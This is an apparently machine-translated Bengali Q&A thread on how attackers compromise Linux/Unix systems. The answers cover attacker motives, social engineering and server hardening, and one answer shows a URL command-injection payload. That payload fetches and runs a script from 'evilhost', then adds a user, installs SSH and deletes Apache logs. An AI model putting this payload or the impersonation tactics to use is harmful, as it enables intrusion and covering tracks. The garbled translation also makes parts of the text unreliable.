কীভাবে লোকেরা ইউনিক্স / লিনাক্স সিস্টেমগুলিকে "ক্র্যাক" করে?


13

আমি কোনও ক্র্যাকার বা সে জাতীয় কিছু হয়ে উঠতে চাইছি না, তবে আমি প্রক্রিয়াটি বের করার চেষ্টা করছি (প্রোগ্রামিং দৃষ্টিকোণ থেকে আরও)।

সুতরাং আমি ধরে নিচ্ছি (অনুমান করা) একজন ক্র্যাকারের মূল লক্ষ্যটি তিনি লিখেছেন যা কিছু সফ্টওয়্যার (বা স্ক্রিপ্ট) ইনস্টল করতে রুট অ্যাক্সেস অর্জন করা? বা সম্ভবত তাদের নিজস্ব কার্নাল মডিউল ইনস্টল করা (যে কোনও কারণেই বুদ্ধিমানের কাজ) কোনও ব্যক্তি ঠিক কীভাবে এই কাজটি চালিয়ে যান?

আমি জানি লোকেরা স্ক্রিপ্টগুলি শোষণের জন্য যাচাই করতে ব্যবহার করে ...... তবে আমি কীভাবে তা দেখতে পাচ্ছি না এবং একবারে তারা খুঁজে পেলে তারা তাদের সাথে কী করে তা আমি ঠিক দেখতে পাই না? তারা কি জানা শোনাগুলির জন্য সংস্করণগুলি পরীক্ষা করছে ...... এবং তারপরে একবার তাদের একটি খুঁজে পাবে .......

আমি জানি এই সব খুব নতুন শব্দ sounds তবে আমি কীভাবে এটি কাজ করে তার একটি ধারণা পাওয়ার চেষ্টা করছি যেহেতু আমি জানি যে লিনাক্স / ইউনিক্স সিস্টেমগুলি খুব সুরক্ষিত বলে মনে করা হচ্ছে তবে আমি কীভাবে কেউ কীভাবে রুট অ্যাক্সেস অর্জনের (প্রক্রিয়া) সম্পর্কে যেতে পারে তা নির্ধারণ করার চেষ্টা করছি।

উত্তর:


14

সিস্টেমের সুরক্ষায় আপোষ করার চেষ্টা করতে পারে এমন অসংখ্য কারণ রয়েছে। বিস্তৃত স্ট্রোক:

  • সিস্টেমের সংস্থানগুলি ব্যবহার করতে (যেমন স্প্যাম প্রেরণ করুন, ট্র্যাফিক রিলে)
  • সিস্টেমে অর্জন তথ্য (যেমন একটি ইকমার্স সাইট থেকে গ্রাহকের তথ্য পাবেন) করার জন্য।
  • সিস্টেমে তথ্য পরিবর্তন করতে (উদাহরণস্বরূপ কোনও কোনও ওয়েবসাইটকে কলুষিত করা, মিথ্যা তথ্য লাগান, তথ্য সরান)

শুধুমাত্র কখনও কখনও এই জিনিসগুলির জন্য রুট অ্যাক্সেসের প্রয়োজন হয়। উদাহরণস্বরূপ, কোনও সাইটে একটি ত্রুটিযুক্ত অনুসন্ধান অনুসন্ধান প্রবেশ করানো যা ব্যবহারকারীদের ইনপুটটিকে সঠিকভাবে স্যানিট করে না সে সাইটের ডেটাবেস, যেমন ব্যবহারকারীর নাম / পাসওয়ার্ড, ইমেল ঠিকানা ইত্যাদি থেকে তথ্য প্রকাশ করতে পারে can

অনেক কম্পিউটার অপরাধী কেবল "স্ক্রিপ্ট কিডিস"; উদাহরণস্বরূপ যে সমস্ত লোকেরা প্রকৃতপক্ষে সিস্টেম সুরক্ষা বুঝতে পারে না, এবং কোডও নাও দিতে পারে তবে অন্যের লিখিত শোষণ চালায়। এগুলি সাধারণত খুব সহজেই এর বিরুদ্ধে রক্ষিত হয় কারণ তাদের অভিযোজন করার ক্ষমতা নেই; তারা জ্ঞাত দুর্বলতাকে কাজে লাগাতে সীমাবদ্ধ। (যদিও তারা বোটনেটগুলি লাভ করতে পারে - আপসযুক্ত কম্পিউটারের বৃহত গোষ্ঠী - যার অর্থ ডিডোএস আক্রমণগুলির বিপদ হতে পারে))

দক্ষ আক্রমণকারীর জন্য, প্রক্রিয়াটি এরকম কিছু হয়:

  1. লক্ষ্যটি কী, এবং লক্ষ্যটি কী মূল্যবান তা নির্ধারণ করুন। সুরক্ষা - এটি বজায় রাখা বা সমঝোতা করা - এটি একটি ঝুঁকি / পুরষ্কার গণনা। ঝুঁকিপূর্ণ এবং আরও ব্যয়বহুল কিছু হ'ল, আক্রমণটিকে সার্থক করার জন্য পুরস্কারটি তত বেশি অন্তর্ভুক্ত হওয়া উচিত।

  2. উদাহরণস্বরূপ, যদি আপনি স্প্যাম পাঠাতে চান, আপনি - প্রভাব যাই হোক না কেন লক্ষ্য যে সব চলন্ত অংশ বিবেচনা করতে পারে মেইল সার্ভার আক্রমণ, কিন্তু এটা পরে ভিন্ন কোনো নেটওয়ার্ক ফেসিং সেবা যেতে আরো ইন্দ্রিয়, আপনি কি সত্যিই করতে পারে সব প্রয়োজন হ'ল টার্গেটের নেট সংযোগ ব্যবহার করা। যদি আপনি ব্যবহারকারীর ডেটা চান, আপনি ডাটাবেস সার্ভার, ওয়েব অ্যাপ এবং ওয়েব সার্ভার যা এতে অ্যাক্সেস করার ক্ষমতা রাখে, যে সিস্টেমটি এটির ব্যাক আপ রাখে ইত্যাদি etc.

    মানুষের ফ্যাক্টরটি কখনই ছাড় করবেন না। একটি কম্পিউটার সিস্টেমের নিরাপত্তা মানুষের আচরণ সুরক্ষিত চেয়ে অনেক সহজ। কাউকে তাদের তথ্য প্রকাশ না করা বা কোড চালানো উচিত নয়, তা প্রকাশ করা সহজ এবং কার্যকর। কলেজে, আমি এমন এক বন্ধুর সাথে বাজি জিতেছিলাম যেটি তার উবার-সুরক্ষিত কর্পোরেট নেটওয়ার্কের সাথে একটি প্রকাশক পোশাক দান করে এবং একজন প্রচ্ছন্ন ভাইস প্রেসিডেন্ট হিসাবে চালিয়ে জড়িত - আমার বন্ধুর প্রযুক্তিগত দক্ষতা আমার চেয়ে অনেক বেশি, কিন্তু কোনও 17- এর শক্তি কেটে যায় না একটি ছোট স্কার্ট মধ্যে সহ-ed!

    আপনার যদি বুসের অভাব হয়, অবাস্তব কোনও খেলা বা এমন কিছু উপস্থাপনের বিষয়টি বিবেচনা করুন যা সত্যিই কী করছে তা বিবেচনা না করে মূর্খরা মজাদার জন্য ডাউনলোড করবে।

  3. আপনার চিহ্নিত প্রতিটি অংশ দেখুন, এবং এটি কী করতে পারে তা বিবেচনা করুন এবং কীভাবে আপনি চান তা করার জন্য কীভাবে টুইট করা যেতে পারে - সাহায্যকারী ডেস্ক কলকারীর যথাযথ পরিচয় না দিয়ে ঘন ঘন ব্যবহারকারীদের জন্য পাসওয়ার্ড পুনরায় সেট করে এবং তাদের বিভ্রান্তিপূর্ণ শব্দ বলে ডাকে আপনি অন্য কারও পাসওয়ার্ড পেতে। সম্ভবত ওয়েব অ্যাপ্লিকেশন অনুসন্ধান বাক্সে কী রয়েছে তা যাচাই করছে না এটি নিশ্চিত করার জন্য এটি চালিত কোনও ফাংশনে এটি স্টিক করার আগে কোডটি নয় make সুরক্ষা আপোসগুলি সাধারণত উদ্দেশ্যমূলকভাবে উদ্ভাসিত কিছু দিয়ে শুরু হয় যা এমনভাবে আচরণ করা যায় যা না করা উচিত।


3
পড়ার পরেও আমি এখনও আগ্রহী যে কোনও প্রবীণ ভাইস প্রেসিডেন্ট নৈমিত্তিক কথোপকথনে কী তথ্য সরবরাহ করতে পারে যা আপনাকে সেই বাজিটি জিততে পারে।
জাস্টিন ক্রেস্ট 22

1
@justin: আমি আগেই বলেছি আমি $ বন্ধু পুনরায় সেখানে দেখতে ছিল: একটি স্কুল প্রকল্পের কিন্তু সে অফিস থেকে বের হন। আমি কম্পিউটার কম্পিউটার সম্পর্কে ভিপি আমাকে কিছু তুচ্ছ জিনিস দেখিয়ে দিয়েছি এবং আমার দিকে তাকিয়ে তিনি খুব বিচলিত হয়ে গিয়েছিলেন যে আমি তাকে তার পাসওয়ার্ডটি প্রবেশ করিয়ে দেখেছি observed তিনি ড্রাইভ আমি অ্যাক্সেস করতে অনুমিত ছিল বাজি জিতে করার বৈধ অ্যাক্সেস ছিল।
হেজেজেজ

1
আমি পুরোপুরি একমত, সামাজিক ইঞ্জিনিয়ারিং পর্যন্ত সহজ গাদা চেয়ে উপচে হয়। আপনি সত্যিই এই সংরক্ষণাগারটি
রোহান মঙ্গা

"আপনার যদি বুসের অভাব হয়, তবে অর্থহীন খেলা বা কিছু উপস্থাপন বিবেচনা করুন" .. গুরুত্ব সহকারে? আপনি উভয়কে কার্যকারিতা হিসাবে একই বিভাগে রেখেছেন ?! :)
রূপেশ শনয়

2
"একটি অর্থহীন খেলা বা এমন কিছু উপস্থাপনের কথা বিবেচনা করুন যা মজাদারদের জন্য ডাউনলোড করবে ..." - আহ, সুতরাং ফার্মভিল এবং এভনির পিছনে এই ধারণাটি।
শাদুর

4

বৃহত্তম ফ্যাক্টর এক্সেস আক্রমণকারী হয়েছে প্রকার। যদি তাদের দৈহিক অ্যাক্সেস থাকে তবে আপনি ক্ষতিগ্রস্থ হন। আপনি যদি কেবল দূরবর্তী অ্যাক্সেস নিয়েই উদ্বিগ্ন থাকেন তবে এটি আপনার চলমান নির্ভর করে; ভাল কনফিগারেশন সবকিছু। একটি আদর্শ লিনাক্স সার্ভার সম্ভবত FTP চলমান করা হবে SSH, HTTP, HTTPS, এবং MySQL। , SSH নিরাপদ, কিন্তু আমি মূল লগইন অনুমতি দেয় না হবে, এবং যে অ্যাকাউন্টে একটি ভাল পাসওয়ার্ড একটি আবশ্যক। এফটিপি হিট বা মিস হয়। আপনার যদি ভিএসএফটিপি থাকে এবং আপনার ব্যবহারকারীদের ক্রুট করেন তবে এটি খুব সুরক্ষিত। অন্যান্য বেশ কয়েকটি সংস্করণ দুর্বলতাগুলি জানে। এইচটিটিপি সম্ভবত আপনার সবচেয়ে দুর্বল অঞ্চল হতে চলেছে। আপনার সবচেয়ে বড় উদ্বেগের বিষয় এখানে কিছু যে সিস্টেমে সিস্টেমে, executes ফাইল, অথবা আপলোড ফাইল। আপনার ওয়েবসাইটটি পিএইচপি 5 এ করা হলে এসকিউএল ইঞ্জেকশনটি খুব শক্ত। নিরাপত্তা একদল ছাত্র এবং নিজেকে সপ্তাহের জন্য একটি unsanitized PHP5 ওয়েবসাইটে এসকিউএল ইনজেকশনও চেষ্টা এবং অসফল ছিল। মাইএসকিউএল সহ একটি নন-রুট ব্যবহারকারী ব্যবহার করা নিশ্চিত করুন এবং এটি কেবল আপনার অ্যাপাচি সার্ভার থেকে লগইন করতে সীমাবদ্ধ করুন।

ওয়েবসাইটের দুর্বলতাগুলি পরীক্ষা করার জন্য ফায়ারফক্সের বেশ কয়েকটি প্লাগইন রয়েছে: আমাকে অ্যাক্সেস করুন, আমাকে এক্সএস করুন এবং এসকিউএল আমাকে ইনজেক্ট করুন

সুরক্ষা চালানো হবে তা নিশ্চিত করতে প্রতিযোগিতাগুলিতে আমি সর্বদা কিছু করতাম big

  • netstat - খোলা বন্দর এবং সংযোগগুলি পরীক্ষা করুন,
  • w - কে লগ ইন আছে, কতক্ষণ,
  • লগইনগুলির জন্য লগগুলি পরীক্ষা করুন,
  • সম্পাদিত আদেশের জন্য বাশ ইতিহাস,
  • ps - চলমান কমান্ড,
  • /etc/passwd অতিরিক্ত ব্যবহারকারীদের জন্য
  • /etc/sudoers sudo অ্যাক্সেস জন্য।

সাধারণত অ্যাক্সেস পাওয়ার পরে, একজন আক্রমণকারী শিকড় পেতে চায়। বর্তমানে কয়েকটি সুবিধাসমূহ বাড়ানোর দুর্বলতা রয়েছে যা একটি সাধারণ ব্যবহারকারীর শিকড় পেতে দেয়। এর পরে, তারা এটির পরে ব্যবহারকারীদের যুক্ত করে এবং পিছনের দরজা খোলার মাধ্যমে এটি অ্যাক্সেসের জন্য খুলতে চান।

আমার স্কুলের সাইবার প্রতিরক্ষা ওয়েবসাইট এখানে। চারপাশে নিখরচায় এবং কিছু প্রশ্ন জিজ্ঞাসা করুন: https://thislink.doesntexist.org/


2

কোনও সিস্টেমের সুরক্ষা অ্যাডমিনিস্ট্রেটরদের দক্ষতার উপর নির্ভর করে, সুতরাং "লিনাক্স / ইউনিক্স সিস্টেমগুলি খুব সুরক্ষিত বলে মনে করা হয়" :) এটি বলা ভুল :)

এখন হ্যাকিংয়ের দিকে যেতে ... নেসাসের মতো " দুর্বলতা স্ক্যানার " নামে একটি ধরণের সরঞ্জাম রয়েছে যা জিনিসগুলি শোষণের জন্য অনুসন্ধান করে। একটি জটিল সিস্টেমে এমন হাজার হাজার জিনিস ভুল হতে পারে যেমন একটি সুনির্দিষ্ট কনফিগার করা অ্যাপাচি সার্ভার যথেচ্ছ স্থানে স্বেচ্ছাসেবী ফাইল আপলোড করার অনুমতি দেয়। এগুলি আরও শোষণের জন্য পদক্ষেপ হিসাবে কাজ করতে পারে যেমন একটি ডাটাবেসে অ্যাক্সেস অর্জন করা বা এমন ইমেল অ্যাকাউন্ট যা থেকে "ভুলে যাওয়া পাসওয়ার্ড" বৈশিষ্ট্যটির মাধ্যমে পাসওয়ার্ডগুলি পুনরুদ্ধার করা যায়।

কখনও কখনও হ্যাক অ্যাক্সেস অর্জন এবং কিছু খারাপ কাজ হয়। কখনও কখনও লোকেরা মজাদার জন্য এটি করে (যা নির্বোধ, উপায় দ্বারা)।

এবং, এখানে একটি বিখ্যাত হ্যাকের একটি গল্প দেওয়া হয়েছে যা বেশ সম্প্রতি ঘটেছিল। আমার মনে হয় এটা যারা নিরাপত্তা এ খুঁজছেন হয় থেকে অর্থবোধক হতে হবে! শোষণের সংক্ষিপ্তসার উদ্ধৃত করতে:

এসকিউএল ইঞ্জেকশন ত্রুটি এবং সুরক্ষিত পাসওয়ার্ড সহ একটি ওয়েব অ্যাপ্লিকেশন। পাসওয়ার্ড খারাপভাবে চয়ন করা হয়েছে। যে পাসওয়ার্ডগুলি পুনরায় ব্যবহার করা হয়েছিল। সার্ভারগুলি যা পাসওয়ার্ড-ভিত্তিক প্রমাণীকরণের অনুমতি দেয়। সিস্টেম যে patched করা হয় নি। এবং ই-মেইলের মাধ্যমে শংসাপত্রগুলি প্রদান করার জন্য একটি আশ্চর্যজনক ইচ্ছুকতা, এমনকি যদি ব্যক্তির কাছে তাদের জিজ্ঞাসা করা হয় তবে বুঝতে হবে যে কিছু একটা শেষ।


1

তাই অনেক আক্রমণ ভেক্টর অসীম কাছাকাছি হতে মতো থাকে। সাধারণভাবে ধারণাগুলিগুলির মধ্যে একটি হ'ল কোনও প্রোগ্রামকে সর্বজনীনভাবে উপলব্ধ করা এবং এটি বলা যে এটি সত্যই ব্যতীত অন্য কিছু করে। sudoশুরুতে ব্যবহারকারীদের সাথে বন্ধুত্বপূর্ণ নির্দেশ দিন এবং বিশ্বকে আরও বাড়িয়ে তুলুন। এই বদ্ধ সোর্স প্রোগ্রাম সঙ্গে প্রতিদিন ঘটে, যেহেতু এটি unfeasible এর একটি একক ব্যক্তি তার ক্রিয়াকাণ্ড পরিদর্শন পূর্বেই, এর জন্য উদাহরণস্বরূপ দেখা সনি সিডি

এছাড়াও আপনি একটি দূরবর্তী হোস্ট বিশেষ স্ট্রিং পাঠাতে চেষ্টা করতে পারেন। একটি উচ্চ পর্যায়ের উদাহরণস্বরূপ, যদি আপনি এটা চলমান কিছু সফটওয়্যার দিয়ে ওয়েব সার্ভার, এবং যে সফ্টওয়্যার বলার একটি কমান্ড হিসাবে URL এর রান অংশ পলায়নের বা অন্যথায় নিশ্চিত এটা কোনো ক্ষতি করতে পারবে না ছাড়া। কিছু পাঠান http://www.example.org/search?q=foo%3Bwget%20http%3A%2F%2Fevilhost%2Fscript.sh%3B%20chmod%20u%2Bx%20script.sh%3B%20.%2Fscript.sh। ডিকোডড, অনুসন্ধানের স্ট্রিংটি হয়ে যায় । যদি এটি চালানো হয়, স্ক্রিপ্ট.শ মেশিনে কিছু করার জন্য ওয়েব সার্ভার ব্যবহারকারী হিসাবে একই অ্যাক্সেস অধিকারের সাথে চালিত হবে। কখনও কখনও লোকেরা এটিকে "সুবিধার্থে" মূল হিসাবে চালাতে দেয়, এক্ষেত্রে অলসতা এবং / বা ক্লুলেসির প্রতিশব্দ। এমনকি যদি এটা রুট হিসাবে চালনা করা, যে স্ক্রিপ্ট তারপর ইনস্টল থাকা সফ্টওয়্যার অন্যান্য গর্ত জন্য পরীক্ষার হাজার হাজার চালানোর জন্য, এবং যদি এটা এক খুঁজে বের অন্য কমান্ড চালানো হবে। যে শেষ কমান্ড উদাহরণস্বরূপ হতে পারেfoo;wget http://evilhost/script.sh; chmod u+x script.sh; ./script.shuseradd blabla; apt-get install openssh; rm /var/log/apache.log, এসএসএইচ অ্যাক্সেস পেতে এবং ব্রেক-ইন এর ট্রেসগুলি সরাতে।

[কমান্ড স্পষ্টত সরলীকৃত হয় এবং সম্ভবত যাহাই হউক না কেন কাজ করবে না। YMMV]

আমাদের সাইট ব্যবহার করে, আপনি স্বীকার করেছেন যে আপনি আমাদের কুকি নীতি এবং গোপনীয়তা নীতিটি পড়েছেন এবং বুঝতে পেরেছেন ।
Licensed under cc by-sa 3.0 with attribution required.